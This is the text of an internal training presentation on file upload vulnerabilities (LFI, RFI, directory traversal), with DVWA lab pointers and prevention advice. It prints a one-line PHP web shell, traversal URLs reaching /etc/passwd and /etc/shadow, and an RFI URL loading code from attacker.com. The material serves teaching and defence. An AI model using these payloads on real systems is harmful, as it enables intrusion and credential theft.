File Upload Vulnerabilities
A presentation at internal in March 2023 in by Avanthika Anand
File Upload Vulnerabilities
● ● ● Occurs when a web application allows users to submit input to files or upload files to the server. Allows to read or execute files on the victimʼs machine Types of File upload vulnerabilities: ○ ○ Local file inclusion or LFI Remote file inclusion or RFI
What is LFI? An LFI can trick the website to exposing or running files on the web server. An LFI can lead to information disclosure,remote code execution or even XSS This vulnerability exists when a web application includes a file without correctly sanitising the input, allowing and attacker to manipulate the input and inject path traversal characters and include other files from the web server.
LFI Example http://example-website.com/?file=filename.php http://example-website.com/?file=../../../etc/passwd In the absence of proper filtering, the server will display the sensitive content of the /etc/passwd file and the attacker will be finally able to gain host-related information.
Uploading a php file with the following code may result in command injection:
<?php echo system($_GET[‘command’]); ?>GET /example/exploit.php?command=id HTTP/1.1
The parameters that can be given are not limited to /etc/passwd. There are a lot more: ● /etc/issue ● /proc/version ● /etc/profile ● /etc/passwd ● /etc/shadow ● /root/.bash_history
Directory Traversal Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows. http://example.com/?file=../../../../etc/passwd The expression ../ instructs the system to go one directory up which is commonly used as an operating system directive. The attacker has to guess how many directories he has to go up to find the Windows folder on the system, but this is easily done by trial and error.
LABS 1. RCE via web shell upload Link 2. Content-type bypass Link
What is RFI? ● ● ● ● ● ● ● Similar to LFI Allows external URL to be injected. The attacker can execute malicious code from an external source instead of accessing a file on the local web server. When web applications allow user input, such as URL, parameter value, etc, and pass them to the “file include” mechanisms without proper sanitization, attackers can manipulate the web application to include remote files with malicious scripts. targeting vulnerabilities in web applications that dynamically reference external scripts Attackers can exploit RFI vulnerabilities by crafting a URL that points to a malicious file on a remote server, and then tricking a user into visiting the URL or injecting the URL into a web page that the user visits. developers forget to disable the “allow_url_include” function in the php configuration file causing an RFI vulnerability aries in the web application
RFI Example http://example.com/vulnerable.php?file=http://attacker.com/malicious.txt
LFI and RFI demo in DVWA Download the source code: https://github.com/cytopia/docker-dvwa Go to http://localhost:8000
How to prevent? +
Check the file extension against a whitelist of permitted extensions rather than a blacklist of prohibited ones. It’s much easier to guess which extensions you might want to allow than it is to guess which ones an attacker might try to upload. Make sure the filename doesn’t contain any substrings that may be interpreted as a directory or a traversal sequence (../). Rename uploaded files to avoid collisions that may cause existing files to be overwritten. Do not upload files to the server’s permanent filesystem until they have been fully validated. As much as possible, use an established framework for preprocessing file uploads rather than attempting to write your own validation mechanisms.
